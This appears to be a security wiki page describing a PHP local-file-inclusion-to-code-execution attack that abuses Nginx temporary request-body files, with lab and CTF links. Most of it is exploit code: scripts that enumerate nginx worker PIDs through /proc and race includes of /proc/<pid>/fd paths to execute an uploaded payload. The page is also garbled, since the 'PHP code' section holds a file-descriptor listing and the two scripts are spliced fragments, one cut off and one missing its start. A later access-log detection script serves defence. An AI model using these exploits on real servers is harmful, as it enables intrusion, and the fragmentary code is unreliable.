LFI2RCE via Nginx temp files


## Vulnerable configuration

Example from https://bierbaumer.net/security/php-lfi-with-nginx-assistance/

* PHP code:

```
/dev/pts/0
lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0
lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon_inode:[eventfd]
lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:[27587]
lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:[27589]
lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:[44926]
lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:[44927]
lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted)
...
```

Note: One cannot directly include `/proc/34/fd/15` in this example, because PHP's `include` function would resolve the path to `/var/lib/nginx/body/0000001368 (deleted)`, which does not exist in the filesystem. This minor restriction can luckily be bypassed with some indirection such as `/proc/self/fd/34/../../../34/fd/15`, which will finally execute the content of the deleted `/var/lib/nginx/body/0000001368` file.

## Full Exploit

```python
#!/usr/bin/env python3
import sys, threading, requests

# exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance
# see https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ for details

URL = f'http://{sys.argv[1]}:{sys.argv[2]}/'

# find nginx worker processes
r = requests.get(URL, params={
    'file': '/proc/cpuinfo'
})
cpus = r.text.count('processor')

r = requests.get(URL, params={
    'file': '/proc/sys/kernel/pid_max'
})
pid_max = int(r.text)
print(f'[*] cpus: {cpus}; pid_max: {pid_max}')

nginx_workers = []
for pid in range(pid_max):
    r = requests.get(URL, params={
        'file': f'/proc/{pid}/cmdline'
    })

    if b'nginx: worker process' in r.content:
        print(f'[*] nginx worker found: {pid}')

        nginx_workers.append(pid)
        if len(nginx_workers) >= cpus:
            break

done = False

# upload a big client body to force nginx to create a /var/lib/nginx/body/$X
def uploader():
    print('[+] starting uploader')
    while not done:
        requests.get(URL, data=' //'
```

```python
        requests_session.post(SERVER + "/?action=read&file=/bla", data=(payload + ("a" * (body_size - len(payload)))))
    except:
        pass

def send_payload_worker(requests_session):
    while True:
        send_payload(requests_session)

def send_payload_multiprocess(requests_session):
    # Use all CPUs to send the payload as the request body for Nginx
    for _ in range(multiprocessing.cpu_count()):
        p = multiprocessing.Process(target=send_payload_worker, args=(requests_session,))
        p.start()

def generate_random_path_prefix(nginx_pids):
    # This method creates a path from a random number of ProcFS path components.
    # A generated path will look like /proc/<nginx pid 1>/cwd/proc/<nginx pid 2>/root/proc/<nginx pid 3>/root
    path = ""
    component_num = random.randint(0, 10)
    for _ in range(component_num):
        pid = random.choice(nginx_pids)
        if random.randint(0, 1) == 0:
            path += f"/proc/{pid}/cwd"
        else:
            path += f"/proc/{pid}/root"
    return path

def read_file(requests_session, nginx_pid, fd, nginx_pids):
    nginx_pid_list = list(nginx_pids)
    while True:
        path = generate_random_path_prefix(nginx_pid_list)
        path += f"/proc/{nginx_pid}/fd/{fd}"
        try:
            d = requests_session.get(SERVER + f"/?action=include&file={path}").text
        except:
            continue
        # Flags are formatted as hxp{}
        if "hxp" in d:
            print("Found flag! ")
            print(d)

def read_file_worker(requests_session, nginx_pid, nginx_pids):
    # Scan Nginx FDs between 10 - 45 in a loop. Since files and sockets keep closing,
    # it is very common for the request body FD to open within this range
    for fd in range(10, 45):
        thread = threading.Thread(target = read_file, args = (requests_session, nginx_pid, fd, nginx_pids))
        thread.start()

def read_file_multiprocess(requests_session, nginx_pids):
    for nginx_pid in nginx_pids:
        p = multiprocessing.Process(target=read_file_worker, args=(requests_session, nginx_pid, nginx_pids))
        p.start()

if __name__ == "__main__":
    print('[DEBUG] Creating requests session')
    requests_session = create_requests_session()
    print('[DEBUG] Getting Nginx pids')
    nginx_pids = get_nginx_pids(requests_session)
    print(f'[DEBUG] Nginx pids: {nginx_pids}')
    print('[DEBUG] Starting payload sending')
    send_payload_multiprocess(requests_session)
    print('[DEBUG] Starting fd readers')
    read_file_multiprocess(requests_session, nginx_pids)
```
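The request patterns these scripts produce are distinctive in an access log. The following is an added detection example, not part of the original page or the referenced write-up: it flags query values that reference `/proc/<pid>/fd/<n>`, the `cwd`/`root` and `../` indirection, and a sweep over `/proc/<pid>/cmdline`. The combined log format, the sample lines and the sweep threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl, unquote

# /proc/<pid|self>/fd/<n>: an open descriptor of another process used as include target
FD_REF = re.compile(r"/proc/(?:self|\d+)/fd/\d+")
# cwd/root chaining or "fd/<n>/../" used to dodge the "(deleted)" path resolution
INDIRECT = re.compile(r"/proc/(?:self|\d+)/(?:cwd|root)/|/fd/\d+/\.\./")
CMDLINE = re.compile(r"^/proc/(\d+)/cmdline$")
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+) [^"]*"')

def classify(value):
    """Return the set of findings for one query-parameter value."""
    value = unquote(value)  # catch a second layer of percent-encoding
    findings = set()
    if FD_REF.search(value):
        findings.add("procfs-fd-include")
    if INDIRECT.search(value):
        findings.add("procfs-indirection")
    return findings

def scan(lines, pid_sweep_threshold=3):
    """Map client IP -> findings for access-log lines (combined format assumed)."""
    report, pids_probed = defaultdict(set), defaultdict(set)
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, target = m.groups()
        for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            report[client] |= classify(value)
            hit = CMDLINE.match(unquote(value))
            if hit:
                pids_probed[client].add(hit.group(1))
    for client, pids in pids_probed.items():
        if len(pids) >= pid_sweep_threshold:  # many distinct PIDs = worker discovery
            report[client].add("pid-enumeration")
    return {c: f for c, f in report.items() if f}

# Constructed sample log lines (documentation IP ranges, not from a real system)
SAMPLE = [
    '203.0.113.5 - - [25/Dec/2021:23:49:01 +0000] "GET /?file=/proc/1/cmdline HTTP/1.1" 200 12',
    '203.0.113.5 - - [25/Dec/2021:23:49:01 +0000] "GET /?file=/proc/2/cmdline HTTP/1.1" 200 0',
    '203.0.113.5 - - [25/Dec/2021:23:49:02 +0000] "GET /?file=/proc/3/cmdline HTTP/1.1" 200 0',
    '203.0.113.5 - - [25/Dec/2021:23:58:10 +0000] "GET /?file=/proc/self/fd/34/../../../34/fd/15 HTTP/1.1" 200 0',
    '198.51.100.7 - - [25/Dec/2021:23:58:11 +0000] "GET /?action=include&file=%2Fproc%2F31%2Fcwd%2Fproc%2F32%2Froot%2Fproc%2F31%2Ffd%2F12 HTTP/1.1" 200 0',
    '192.0.2.9 - - [25/Dec/2021:23:58:12 +0000] "GET /?file=about.php HTTP/1.1" 200 512',
]
```

Calling `scan(SAMPLE)` returns findings for the first two clients only; the same `classify` check can be applied to the include parameter inside the application before the path ever reaches `include`.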

## Labs

* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz)
* [https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/](https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/)
* [https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/](https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/)

## References

* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
